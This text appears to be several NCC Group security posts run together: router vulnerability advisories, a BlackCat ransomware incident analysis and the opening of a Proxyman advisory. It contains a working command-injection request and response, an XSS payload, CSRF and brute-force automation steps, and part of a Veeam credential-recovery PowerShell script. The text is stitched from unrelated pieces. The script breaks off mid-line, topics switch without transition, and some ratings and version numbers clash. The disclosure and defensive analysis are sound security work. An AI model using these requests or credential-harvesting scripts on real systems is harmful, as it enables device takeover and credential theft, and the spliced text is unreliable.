They can, of course, also exploit any of the vulnerabilities noted under Scenario 1 in addition to the brute force approach.
Scenario 3 – Malware
Assuming our attacker has gained access to the admin panel, either via CSRF or via the brute-force method, the attacker can choose to perform further exploits via cross-site scripting. They could choose to set the password for one of the two Wi-Fi networks (2.4 GHz or 5 GHz) to an exploit string, and upon the rightful admin logging in to investigate, the attacker is able to run arbitrary JavaScript in the victim's browser.
Disclosure
NCC Group attempted to contact Connectize's support team, reaching out via a customer support email address. After receiving no response to our initial email, or to a follow-up email sent a reasonable amount of time later, it was decided to publicly release the following advisories in accordance with NCC Group's responsible disclosure policies. From web searches and open-source research, it appears that the Connectize vendor ceased trading some time in early 2023 – the last cached version of their website on the Internet Archive is from March 29th, 2023. Their website no longer exists and there is no mechanism to contact them. The disclosure timeline can be found at the bottom of this page.
It is important that consumers are aware of the vulnerable Connectize devices. Current owners and users of Connectize devices should seek to replace them with a different, more secure brand of device as soon as possible, since the vulnerabilities present in these devices will never be fixed now that the vendor no longer exists. Similarly, consumers looking to purchase a Wi-Fi router should be aware that, at the time of writing, many popular online stores still stock and sell these vulnerable Connectize devices. In the background, NCC Group is liaising with some of these online stores in an attempt to ensure these devices are withdrawn from sale.
Technical Advisories
Command Injection via Ping Diagnostic Functionality (CVE-2023-24046)
Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24046
Severity: High 8.4 (CVSS v3.1 AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)
Summary
An attacker authenticated to the admin panel can run arbitrary commands on the physical device.
Impact
After exploitation, an attacker will have complete control over the target system, and will be in a position to perform post-exploitation tasks throughout the network.
Details
The ping functionality on the router diagnostics page http://192.168.5.1/diag_ping_admin.htm allows a user to set the IP address that pings are sent to. However, an attacker can append a command to the end of the address as follows, which is then executed as a command on the underlying system.
The following request shows the output of the ls command, listing the files and directories at the root of the HTTP server.
Request
GET /getPingResult.asp?ip_version=0&target_addr=192.168.5.1;+ls;&target_num=2 HTTP/1.1
Host: 192.168.5.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.5.1/diag_ping_admin.htm
Response
HTTP/1.1 200 OK
Date: Tue, 10 Jan 2023 22:59:36 GMT
Server: Boa/0.94.14rc21
Accept-Ranges: bytes
Connection: close
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Content-Length: 371
Last-Modified: Tue, 10 Jan 2023 22:59:36 GMT
Content-Type: text/html
PING 192.168.5.1 (192.168.5.1): 56 data bytes
<br />64 bytes from 192.168.5.1: seq=0 ttl=64 time=0.293 ms
<br />64 bytes from 192.168.5.1: seq=1 ttl=64 time=0.262 ms
<br />
<br />--- 192.168.5.1 ping statistics ---
<br />2 packets transmitted, 2 packets received, 0% packet loss
<br />round-trip min/avg/max = 0.262/0.277/0.293 ms
<br />boa.conf
<br />mime.types
<br />
Observe the lines:
<br />boa.conf
<br />mime.types
<br />
These file names are present in the /etc/boa directory of the router, indicating that the ls command was successfully executed and its output returned to the user.
An attacker can go further and construct a convenient user interface for interacting with the vulnerability in a shell-like manner. With such a shell, an attacker can much more easily navigate the file system and run commands on the device. They can then elevate their access to something more direct, such as by activating the device's BusyBox Telnet functionality and obtaining a telnet shell.
Recommendation
Connectize should implement input validation to ensure that the values passed to the target_addr parameter are only IP addresses or domain names, and do not contain any commands. Any value that is not an IP address or a domain name should be rejected.
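A minimal sketch of such validation in Python, using only the standard library (the function name and hostname pattern are illustrative, not from the vendor's firmware):

```python
import ipaddress
import re

# Conservative hostname pattern: labels of letters, digits and hyphens,
# separated by dots; no shell metacharacters can ever match.
_HOSTNAME_RE = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

def is_safe_ping_target(value: str) -> bool:
    """Allow only a literal IP address or a plain hostname.

    Characters such as ';', '|', '&', '$' and whitespace cannot appear
    in a value that passes these checks, so injected commands like the
    one in CVE-2023-24046 are rejected before reaching the shell.
    """
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return bool(_HOSTNAME_RE.match(value))
```

Validated values should still be passed to the ping binary as a discrete argument rather than interpolated into a shell command line.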
Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24047
Severity: Medium 4.5 (CVSS v3.1 AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)
Summary
The same password used for logging into the web admin interface is used as the root password for the device. Furthermore, the password is stored insecurely on the device via an outdated and insecure hashing algorithm.
Impact
Anyone capable of accessing the router's file system is able to trivially recover both the root password for the device and the password for the admin panel.
Details
The Connectize router uses the admin panel password, as set by the user, as the root password on the device. The password is stored in /etc/passwd and appears to be hashed using DES-based crypt. DES is a known-insecure algorithm that should no longer be used for password hashing. Because this hash can be computed very quickly, hashed passwords are vulnerable to brute-force cracking. An attacker with access to the hashed passwords is likely to be able to recover significant numbers of plaintext passwords using a tool such as hashcat.
Several other important passwords, such as the SMB fileshare password, were also observed to be hashed using DES.
Recommendation
Update the hashing algorithm used for device credentials to a more secure, modern algorithm. Furthermore, consider setting the root password to its own unique value, rather than deriving it from the admin configuration panel password.
Admin Panel Vulnerable to Cross Site Request Forgery (CVE-2023-24048)
Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24048
Severity: Medium 7.5 (CVSS v3.1 AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)
Summary
The web application authentication relies on state tracking to ensure that the user is properly authenticated. This can be bypassed, allowing unauthenticated users to submit requests to the application under certain conditions.
Impact
If an authenticated user visits an attacker-controlled website, the attacker could induce the victim’s browser to send local requests to the application on behalf of the victim user. These requests could be used to make changes to the site, such as changing the admin password or configuring remote logs. It could also be used to leverage other vulnerabilities, such as CVE-2023-24046, a command line injection vulnerability.
In order to perform this attack, the victim must be logged in to the administration panel on the device’s network, but the attacker can be positioned anywhere on the public internet.
Details
The Connectize admin panel application appears to track authentication via two mechanisms. First, it ensures the user is logged in (likely via IP-based or MAC-address-based verification). Second, it tracks the recent actions taken by the user in an attempt to verify that each request was sent as part of the typical user activity flow. This second check can be bypassed in a way that grants admin panel access to any individual who launches a successful phishing campaign against a logged-in administrator. This can be done using an attack known as Cross-Site Request Forgery (CSRF), which is explained below.
The lack of sufficient protections illustrated in this finding applies to the whole application, but is most significant in the user flow for changing the administrator password. This flow begins with a POST request to /boafrm/formPasswordSetup.
If a user sends this request without being logged in, they are redirected to the login page. If, however, a user sends this request while logged in but before they have accessed the password page at http://192.168.5.1/man_password.htm, they are assumed to have bypassed the normal user flow of the application and are served a 403 Forbidden error. This appears to be intended to ensure that only the authenticated user may send requests to the application as part of normal administrative duties.
However, an attacker can satisfy the required conditions for this request by simply sending an HTTP GET request to the man_password.htm page, such as the following.
GET /man_password.htm HTTP/1.1
Host: 192.168.5.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.1/advanced.htm
Connection: close
Upgrade-Insecure-Requests: 1
They then receive an HTTP 200 response containing the contents of the web page.
An attacker could therefore bypass this check and programmatically change the password by using a tool, or writing a script, that sends the GET request to /man_password.htm shortly before the POST request to /boafrm/formPasswordSetup that changes the administrator password.
This attack can be delivered through a phishing campaign prompting the victim to navigate to an attacker-controlled website, configured as follows. Upon being browsed to, the page sends a GET request from the victim's browser to http://192.168.5.1/man_password.htm. If the victim has a Connectize G6 router and is currently logged in to the admin panel, this responds with a 200 OK. The page then sends the second request, a POST to http://192.168.5.1/boafrm/formPasswordSetup, which resets the admin password to anything the attacker desires. The attacker then has complete control of the router, and can send additional requests using their phishing site to make changes and configure the application as they wish. They could even make use of other findings, such as CVE-2023-24046, to take complete command of the device.
This type of attack is known as Cross-Site Request Forgery (CSRF). It is characterized by an attacker using a logged-in victim's session to perform actions on their behalf. CSRF typically requires the victim to open the attacker's phishing website in the same browser as the vulnerable website, so that authentication cookies are transferred along with the forged requests. However, because the Connectize G6 router does not make use of session tokens, authentication cookies, or CSRF tokens, the attack works even if the phishing website is viewed in a different browser on the same machine on which the victim loaded the Connectize G6 admin panel.
Recommendation
Implement a CSRF token as part of the authentication model. If possible, replace the state-based authentication with a more traditional authentication system, such as session cookie based authentication.
Applications can be protected from CSRF attacks by rejecting state-changing requests that do not originate from the application itself. The primary method of verifying that a request originated from the application rather than an external site is to require all state-changing requests to contain an extra parameter known as a CSRF token. These tokens are random values generated by the server and returned to the browser in the body of a response or in a cookie, then submitted as an additional parameter with every state-changing request.
Because an attacking site cannot read the application's cookies or responses, it will be unable to submit the correct value, and any forged request will be rejected.
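The token issue/verify cycle can be sketched in a few lines of Python; the in-memory session store and function names here are hypothetical, not part of the router's firmware:

```python
import secrets
import hmac

# Hypothetical server-side session store: session id -> CSRF token.
_sessions: dict = {}

def issue_csrf_token(session_id: str) -> str:
    """Generate a fresh random token and bind it to the session."""
    token = secrets.token_urlsafe(32)
    _sessions[session_id] = token
    return token  # embedded by the server in a hidden form field

def verify_csrf_token(session_id: str, submitted: str) -> bool:
    """Reject state-changing requests whose token doesn't match."""
    expected = _sessions.get(session_id)
    if expected is None:
        return False
    # Constant-time comparison avoids leaking the token via timing.
    return hmac.compare_digest(expected, submitted)
```

A request to an endpoint like /boafrm/formPasswordSetup would be processed only when verify_csrf_token returns True for the requesting session.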
Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24049
Severity: Medium 4.6 (CVSS v3.1 AV:A/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L)
Summary
It was found that the default passwords for both the Wi-Fi network and the admin panel of the Connectize G6 router are trivially guessable by attackers, and are not required to be reset upon initial configuration.
Furthermore, the router provides the option to automatically set the admin panel password to the same password used to connect to the Wi-Fi.
Impact
An attacker present on the 2.4 or 5 GHz Wi-Fi Networks could trivially guess both the Wi-Fi network password and the admin password, if they have been left unchanged from their factory default. This would allow the attacker to gain complete admin access to the router.
Additionally, in some configurations, a user with credentials sufficient to connect to the Wi-Fi network could have full admin access to the router by default.
Details
The device's default Wi-Fi password is admin, as described both in the router instruction manual and on the sticker on the bottom of the device. This password can also be used to log in to the configuration panel.
Upon initial setup, the user is prompted to set a new password. However, they can bypass this by selecting the “Skip Wizard” option, leaving the passwords at the default.
Furthermore, if a user does proceed to set a new Wi-Fi password, they are presented with a checkbox that sets the admin panel login password to the same value as the Wi-Fi password. This grants full administrative access to all users with access to the Wi-Fi password, even when a non-default password is used.
Recommendation
Connectize should ensure that the router requires users to always change the Wi-Fi password from default upon first login, and should remove the “Skip Wizard” functionality that allows users to bypass this.
Additionally, Connectize should remove the option to set the admin interface password to the same password as the Wi-Fi password shown during initial configuration.
Stored Cross Site Scripting using Wi-Fi Password Field (CVE-2023-24050)
Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24050
Severity: Medium 4.3 (CVSS v3.1 AV:A/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L)
Summary
An attacker who can change the Wi-Fi password can change the password to a carefully crafted Cross Site Scripting string, such as "><script>alert(1)</script>. This string is stored in the router’s data storage application, then incorporated in pages throughout the application, allowing an attacker to run arbitrary JavaScript whenever the string is loaded onto a page.
As this finding requires an attacker to be authenticated, the impact is somewhat limited. However, it can be exploited unauthenticated when combined with attacks such as CVE-2023-24048. Additionally, in a circumstance where multiple individuals share the admin panel credentials, one user could run arbitrary JavaScript in the browsers of all other users.
Impact
An attacker that has gained access to the admin panel can run arbitrary JavaScript code whenever anyone logs in or views various pages in the admin panel. This could be used to query external webpages, steal sensitive information, or perform other privileged actions.
Details
Cross-site scripting (XSS) is a vulnerability class related to web application input and output validation. In stored cross-site scripting, the application accepts input from an end user, stores it, and later displays it without properly encoding HTML metacharacters. This allows an attacker to inject JavaScript code into future views of the resulting page. A user may fall victim to the attack just by using the application, provided that they have connected to either of the Wi-Fi networks or the LAN network provided by the router.
The attacker does not need to change the passwords for both the 2.4 and 5 GHz bands. Simply changing one is sufficient, potentially allowing this attack to go undetected by people using the other network.
Recommendation
When including user submitted data in responses to end users, encode the output based on the appropriate context of where the output is included.
Content placed into HTML needs to be HTML-encoded. To work in all situations, HTML encoding functions should encode the following characters: single and double quotes, backticks, angle brackets, forward and backslashes, equals signs, and ampersands. User-submitted data should not be included in dynamically-generated JavaScript snippets. Instead, encode and return the content in a separate HTML element or API request.
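As a minimal sketch of the HTML-context encoding step, Python's standard library html.escape covers the core metacharacters (ampersands, angle brackets, and both quote characters), though not every character listed above:

```python
from html import escape

# The stored Wi-Fi password payload from CVE-2023-24050:
payload = '"><script>alert(1)</script>'

# Encoding HTML metacharacters before rendering neutralizes the
# payload: it is displayed as text instead of executing as script.
safe = escape(payload, quote=True)
```

Equivalent encoding functions exist for most server-side languages; the important part is applying them at output time, in the context where the value is rendered.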
Admin Panel Account Lockout and Rate Limiting Bypass (CVE-2023-24051)
Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24051
Severity: Medium 4.3 (CVSS v3.1 AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)
Summary
Applications often make use of rate limiting to prevent brute-force password attempts, sometimes enforced via “locking out” a user and preventing them from making further attempts at guessing the password. The Connectize G6 admin panel contains this functionality, but enforces it on the client-side. This allows a user to bypass it in two different ways.
Impact
An attacker attempting to guess the admin password for the router could make as many attempts as they wish without any limitations or restrictions. Given that the minimum password length is 5 characters, an attacker’s ability to guess the admin password is only limited by their network speed. An attacker with a sufficiently good connection could iterate through all possible five-character passwords reasonably quickly, gaining complete control of the admin panel if a password of minimum length was set.
Details
There are two methods to bypass the lockout functionality. Anyone accessing the user interface at 192.168.5.1 via a web browser may attempt to guess the password. After three failed attempts, a popup informs the user they must wait 180 seconds before guessing again.
If the user then refreshes the page, the popup is no longer shown, and the user may make another guess. If this guess is correct, the user is logged in to the admin panel, bypassing the lockout.
Alternatively, a user submitting HTTP requests directly to the application, such as through tools like Burp Suite or Postman, is never shown this prompt to begin with. Failed login requests return an HTTP 302 redirecting the user to the login page, while successful ones redirect the user to the index of the application.
An attacker could trivially automate sending hundreds or thousands of requests in this way, and never encounter the lockout mechanism.
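The automation described above can be sketched as follows. The redirect heuristics mirror the observed behaviour, while the send_login transport and the paths used in the demo are hypothetical stand-ins for the real HTTP requests:

```python
# Sketch of automating password guesses against the admin panel.
# send_login() stands in for the actual HTTP POST (e.g. via urllib);
# the redirect paths below are illustrative assumptions.
from typing import Callable, Tuple

def login_succeeded(status: int, location: str) -> bool:
    # Failed logins 302 back to the login page; successes 302 to the index.
    return status == 302 and "login" not in location

def brute_force(candidates, send_login: Callable[[str], Tuple[int, str]]):
    for password in candidates:
        status, location = send_login(password)
        if login_succeeded(status, location):
            return password
    return None

# Demo with a fake transport standing in for the real router:
fake = lambda pw: (302, "/index.asp") if pw == "s3cret" else (302, "/login.asp")
print(brute_force(["admin", "12345", "s3cret"], fake))  # -> s3cret
```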
Recommendation
Ensure that rate limiting is implemented in the application’s server-side code rather than in client-side JavaScript. This prevents both of these bypasses and helps mitigate brute-force attacks against the application.
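A minimal sketch of what server-side lockout tracking could look like, using the same thresholds the UI claims to enforce (3 attempts, 180 seconds). The per-IP keying and in-memory store are illustrative simplifications:

```python
# Minimal sketch of server-side lockout tracking, keyed per source IP.
# Thresholds mirror the UI behaviour (3 attempts, 180-second lockout);
# a real implementation would persist this across processes/restarts.
import time

MAX_ATTEMPTS, LOCKOUT_SECONDS = 3, 180
_failures = {}  # ip -> (failed_count, last_failure_timestamp)

def is_locked_out(ip: str, now=None) -> bool:
    now = time.time() if now is None else now
    count, last = _failures.get(ip, (0, 0.0))
    return count >= MAX_ATTEMPTS and (now - last) < LOCKOUT_SECONDS

def record_failure(ip: str, now=None) -> None:
    now = time.time() if now is None else now
    count, last = _failures.get(ip, (0, 0.0))
    if (now - last) >= LOCKOUT_SECONDS:
        count = 0  # window expired, start counting again
    _failures[ip] = (count + 1, now)

def record_success(ip: str) -> None:
    _failures.pop(ip, None)  # clear state on successful login
```

Because the state lives on the server, neither refreshing the page nor bypassing the browser entirely affects the lockout.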
Current Password Not Required When Changing Admin Password (CVE-2023-24052)
Vendor: Connectize
Vendor URL: https://iconnectize.com/
Versions affected: All versions up to and including 641.139.1.1256
Systems Affected: Connectize AC21000 Dual Band Gigabit Wi-Fi Router, Model G6
Author: Jay Houppermans
CVE Identifier: CVE-2023-24052
Severity: Medium 4.3 (CVSS v3.1 AV:A/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N)
Summary
The admin panel web application does not require the user to provide the current admin password when changing the credentials.
Impact
An attacker who has gained access to the admin panel without obtaining the credentials first could change the password, locking out the legitimate users and granting themselves indefinite access until the device is factory reset.
Details
It is considered best practice to require a user to authenticate before changing or accessing sensitive information, such as an administrative password. A user who gains access to the admin panel via an unrelated vulnerability, or via access to a logged in computer owned by the legitimate user, could trivially change the password.
Given that the admin panel is also vulnerable to CSRF attacks, as described in CVE-2023-24048, this in effect allows anyone who is successful in a CSRF phishing attempt to change the admin password.
Recommendation
Require users to provide the old password when they change the administrator password.
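A minimal sketch of the recommended check, using a salted hash store as a stand-in for the router’s real credential storage:

```python
# Sketch of verifying the current password before accepting a change.
# The salted-hash store is a stand-in for the device's real storage.
import hashlib, hmac, os

def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

class CredentialStore:
    def __init__(self, password: str):
        self._salt = os.urandom(16)
        self._hash = hash_password(password, self._salt)

    def change_password(self, current: str, new: str) -> bool:
        # Reject the change unless the caller proves knowledge of the
        # current password (constant-time comparison).
        if not hmac.compare_digest(self._hash, hash_password(current, self._salt)):
            return False
        self._salt = os.urandom(16)
        self._hash = hash_password(new, self._salt)
        return True
```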
Disclosure Timeline
March 3rd, 2023: NCC Group reached out to Connectize, announcing to the vendor that vulnerabilities had been found in one of their devices and attempting to initiate a secure conversation regarding these vulnerabilities.
April 7th, 2023: Having received no response to the prior email, NCC Group reached out to Connectize again to inform them of the intent to publicly disclose the bugs unless the vendor responded within the next 30 days.
As of the publishing date of this Technical Advisory, no further communication has occurred and it appears that the Connectize vendor has ceased trading.
It is important that consumers are aware of the vulnerable Connectize devices. Current owners and users of Connectize devices should seek to replace them with a different, more secure brand of device as soon as possible, since the vulnerabilities present in these devices will never be fixed as a result of the vendor no longer existing. Consumers looking to purchase a Wi-Fi router should also be aware that, at the time of writing, many popular online stores still stock and sell these vulnerable Connectize devices. In the background, NCC Group is currently liaising with some of these online stores in an attempt to ensure these devices are withdrawn from sale.
Thanks to
David Goldsmith, Nicholas Bidron, and Eli Sohl for their support throughout the research and disclosure process.
About NCC Group
NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate and respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.
In Summer 2023, the Zcash Foundation engaged NCC Group to conduct a security assessment of the Foundation’s FROST threshold signature implementation, based on the paper FROST: Flexible Round-Optimized Schnorr Threshold Signatures. This project implements v12 of the draft FROST specification in Rust, with a variety of options available for underlying elliptic curve groups. The review was performed by three consultants over 25 person-days of effort. The project concluded with a retest phase a few weeks after the original engagement that confirmed all findings were fixed.
Authors: Alex Jessop @ThisIsFineChief, Molly Dewis
While the main trend in the cyber threat landscape in recent months has been MOVEit and Cl0p, NCC Group’s Cyber Incident Response Team has also been handling incidents involving multiple different ransomware groups over the same period.
In the ever-evolving cybersecurity landscape, one consistent trend witnessed in recent years is the unsettling rise in ransomware attacks. These nefarious acts of digital extortion have left countless victims scrambling to safeguard their data, resources, and even their livelihoods. To counter this threat, every person in the cyber security theatre has a responsibility to shine a light on current threat actor Tactics, Techniques and Procedures (TTPs) to assist in improving defences and the overall threat landscape.
This series will focus on TTPs deployed by four ransomware families recently observed during NCC Group’s incident response engagements. The ransomware families that will be explored are:
BlackCat – Also known as ALPHV, BlackCat was first observed in 2021 and is a Ransomware-as-a-Service (RaaS) that often uses the double extortion method for monetary gain.
Donut – The D0nut extortion group was first reported in August 2022 [1] for breaching networks and demanding ransoms in return for not leaking stolen data. A few months later, reports were released of the group utilizing encryption as well as data exfiltration, with speculation that the ransomware deployed by the group was linked to HelloXD ransomware [2]. There are also suspected links between D0nut affiliates and both the Hive and Ragnar Locker ransomware operations.
Medusa – Not to be confused with MedusaLocker, Medusa was first observed in 2021 and is a Ransomware-as-a-Service (RaaS) that often uses the double extortion method for monetary gain. In 2023 the group’s activity increased with the launch of the ‘Medusa Blog’. This platform serves as a tool for leaking data belonging to victims.
NoEscape – At the end of May 2023, a newly emerged Ransomware-as-a-Service (RaaS) named NoEscape was observed on a cybercrime forum.
Join us as we delve into the inner workings of these ransomware families, gaining a better understanding of their motivations, attack vectors and TTPs.
To begin our deep dive we will start with…
Not so lucky: BlackCat is back!
Summary
This first post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving BlackCat Ransomware.
Below is a summary of the findings presented in this blog post:
Installation of various services.
Creation of new accounts.
Modification and deletion activity.
Credential dumping activity.
Use of remote access applications.
Data staging.
Presence of MEGAsync.
Analysis of the ransomware executable.
BlackCat
BlackCat ransomware, also known as ALPHV, is a Rust-based variant that was first seen in November 2021. BlackCat is provided under a ransomware-as-a-service (RaaS) model and is an example of double-extortion ransomware: data is exfiltrated as well as encrypted, and the victim is threatened with publication of their data if the ransom is not paid [1]. The group behind BlackCat ransomware can be characterised as financially motivated. BlackCat ransomware targets no specific industry and has the capability to encrypt both Windows and Linux hosts. BlackCat ransomware uses AES to encrypt files, or ChaCha20 if AES is not supported by the system’s hardware [4].
Incident Overview
In this incident, the initial access vector was unknown. Prior to the execution of the ransomware, a wide variety of activity was observed such as the installation of new services, creation of new accounts and data staging. Data was believed to have been exfiltrated due to the techniques employed, however, no data was published to the leak site.
Maintaining access to the victim’s environment was achieved by the threat actor creating a new Administrator account and a new default admin user, azure.
Additionally, a Total Software Deployment Audit Service Windows service was installed (see below); likely to maintain persistence on the affected host. Total Software Deployment supports group deployment, maintenance, and uninstallation of software packages. BlackCat ransomware is known to use Total Software Deployment [3].
The ransomware payload, min.exe, used fsutil behavior set SymlinkEvaluation R2R:1 to enable remote-to-remote symbolic link evaluation, redirecting file system access to a different location once access to the network was gained.
Credential Access
Various techniques to gather credentials were employed by the threat actor.
Due to the presence of Veeam in the victim’s environment, C:\PerfLogs\Veeam-Get-Creds.ps1 below was leveraged to recover passwords used by Veeam to connect to remote hosts.
# About: The script is designed to recover passwords used by Veeam to connect
#        to remote hosts vSphere, Hyper-V, etc. The script is intended for
#        demonstration and academic purposes. Use with permission from the
#        system owner.
#
# Author: Konstantin Burov.
#
# Usage: Run as administrator (elevated) in PowerShell on a host in a Veeam
#        server.

Add-Type -assembly System.Security

#Searching for connection parameters in the registry
try {
    $VeaamRegPath = "HKLM:\SOFTWARE\Veeam\Veeam Backup and Replication\"
    $SqlDatabaseName = (Get-ItemProperty -Path $VeaamRegPath -ErrorAction Stop).SqlDatabaseName
    $SqlInstanceName = (Get-ItemProperty -Path $VeaamRegPath -ErrorAction Stop).SqlInstanceName
    $SqlServerName = (Get-ItemProperty -Path $VeaamRegPath -ErrorAction Stop).SqlServerName
} catch {
    echo "Can't find Veeam on localhost, try running as Administrator"
    exit -1
}
""
"Found Veeam DB on " + $SqlServerName + "\" + $SqlInstanceName + "@
Events like the above and any others related to ScreenConnect activity can be found in Application.evtx.
Subsequently, evidence of a file named mimikatz.log was observed. It is highly likely Mimikatz was leveraged by the threat actor to harvest credentials.
Finally, it is likely the threat actor enumerated C:\Windows\NTDS\ntds.dit, as the following files were created: 1.txt.ntds, 1.txt.ntds.kerberos, 1.txt.ntds.cleartext. These file names match the output produced by Impacket [5].
Discovery
The threat actor used ScreenConnect to execute commands like ping <HOST NAME>.<DOMAIN NAME>.local. In some instances, the commands executed were not specified (see below), but a command length of 33 can indicate that commands were executed manually.
At the same time on another host, net.exe and net1.exe were executed. As net is often used by threat actors to gather system and network information, it is possible ScreenConnect was used to gather this type of information.
Analysis of the ransomware executable min.exe found that the UUID was obtained using: wmic csproduct get UUID.
Lateral Movement
The threat actor executed PsExec.exe. BlackCat has been known to use PsExec to replicate itself across connected servers [6].
Collection
Data staging was conducted by the threat actor as multiple .zip files were created that are believed to have been exfiltrated.
Additionally, one of the accounts compromised by the threat actor executed WinRAR. Across the time period of interest, folders on multiple drives were modified; the threat actor potentially accessed these folders.
Command and Control
Remote access applications, particularly ScreenConnect, were heavily utilised by the threat actor. ScreenConnect was used to start remote sessions, execute commands and transfer files. The threat actor transferred the following files: mimikatz.exe, MEGAsyncSetup64.exe, tsd-setup.exe, 121.msi* and 212.msi*.
Atera is used for remote monitoring and management and the Atera Agent is required for hosts to be monitored. It is likely Atera was used for persistence.
Splashtop allows hosts to be remotely accessed and was likely used for persistence especially as the Splashtop® Remote Service was observed going online. Splashtop events are also located in Application.evtx.
Exfiltration
Data staging was observed as a technique used by the threat actor. Multiple .zip files were created at the same time within C:\PerfLogs. It is believed these .zip files were exfiltrated.
For one of the compromised accounts, WinRAR was observed at C:\Users\<USER>\Desktop\winrar-x64-621.exe. It is possible this utility was used for data exfiltration.
MEGAsync is a legitimate cloud storage solution, however, it is often used by threat actors for exfiltrating data. Due to its presence in the victim’s environment, it is highly likely the threat actor used MEGA to exfiltrate data.
MEGA was observed to once reside in the following locations:
Additionally, MEGA-related strings were recovered from the encrypted VMDKs:
MEGAsyncSetup64.exe
MEGAsync.exe
MEGA Website.lnk
MEGAsync.cfg.bak
MEGAsync.log
MEGAsync Update Task [SID]
MEGAsync.lnk
Impact
BlackCat ransomware was deployed to the affected domain in the form of min.exe. Data was encrypted and .dujcsfd was appended to files. A ransom note was dropped onto the compromised Windows servers.
min.exe
PsExec was highly likely used to distribute the ransomware across the affected domain as BlackCat has a built-in PsExec module [7].
Additionally, min.exe had the following command line options:
access-token: Access token.
paths: Only process files inside defined paths.
no-net: Do not discover network shares on Windows.
no-prop: Do not self-propagate (worm) on Windows.
no-wall: Do not update desktop wallpaper on Windows.
no-impers: Do not spawn impersonated processes on Windows.
no-vm-kill: Do not stop VMs on ESXi.
no-vm-snapshot-kill: Do not wipe VM snapshots on ESXi.
no-vm-kill-names: Do not stop defined VMs on ESXi.
sleep-restart: Sleep for duration in seconds after successful run and then restart.
sleep-restart-duration: Keep soft persistence alive for duration in seconds (24 hours by default).
sleep-restart-until: Keep soft persistence alive until defined UTC time in millis (defaults to 24 hours since launch).
no-prop-servers: Do not propagate to defined servers.
prop-file: Propagate specified file.
drop-drag-and-drop-target: Drop drag and drop target batch file.
drag-and-drop: Invoked with drag and drop.
log-file: Enable logging to specified file.
verbose: Log to console.
extra-verbose: Log more to console.
ui: Show user interface.
safeboot: Reboot in Safe Mode before running on Windows.
safeboot-network: Reboot in Safe Mode with Networking before running on Windows.
safeboot-instance: Run as safeboot instance on Windows.
propagated: Run as propagated process.
child: Run as child process.
bypass: Run as elevated process.
The configuration of min.exe contained 23 elements [8]:
config_id: Configuration ID
extension: File extension appended to files.
public_key: RSA public key.
note_file_name: The file name of the ransom note.
note_full_text: The ransom note in full.
note_short_text: A shorter version of the ransom note.
credentials: Credentials used by BlackCat.
default_file_mode: File encryption mode.
default_file_cipher: File encryption cipher.
kill_services: The services to terminate.
kill_processes: The processes to terminate.
exclude_directory_names: Does not encrypt the defined directories.
exclude_file_names: Does not encrypt the defined files.
exclude_file_extensions: Does not encrypt the defined extensions.
exclude_file_path_wildcard: Does not encrypt the defined file paths.
Vendor: Proxyman LLC
Vendor URL: https://proxyman.io/
Versions affected: com.proxyman.NSProxy.HelperTool version 1.4.0 (distributed with Proxyman.app up to and including versions 4.11.0)
Systems Affected: macOS
Author: Scott Leitch <mailto:[email protected]>
Advisory URL / CVE Identifier: CVE-2023-45732
Risk: Medium (Exploitation of this finding enables an attacker to redirect network traffic to an attacker-controlled location)
Summary
The com.proxyman.NSProxy.HelperTool application (version 1.4.0), a privileged helper tool distributed with the Proxyman application (up to and including version 4.10.1) for macOS 13 Ventura and earlier, allows a local attacker to use earlier versions of the Proxyman application to maliciously change the System Proxy settings and redirect traffic to an attacker-controlled computer, facilitating MITM attacks or other passive network monitoring.
